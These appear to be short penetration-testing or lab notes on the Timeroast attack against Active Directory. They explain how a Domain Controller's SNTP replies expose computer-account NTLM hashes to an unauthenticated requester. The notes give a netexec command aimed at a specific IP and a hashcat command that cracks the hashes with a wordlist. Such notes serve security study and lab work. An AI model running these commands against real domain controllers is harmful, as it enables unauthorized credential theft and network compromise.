Timeroast#

More Info

Essentially, what this does is sending some weird SNTP packets that somehow the Domain Controller response with a packet (MAC) that is encrypted by the computer account’s NTLM hash. So we can request every computer accounts’ hash and crack them, as a unauthenticated attacker

Exploit#

We can exploit this by simply run a netexec module on the DC.

nxc smb 10.10.11.75 -M timeroast

Then simply crack the hash

hashcat -a 0 -m 31300 --user ./hash /usr/share/wordlists/rockyou.txt
Backward Smb Win Rm Forward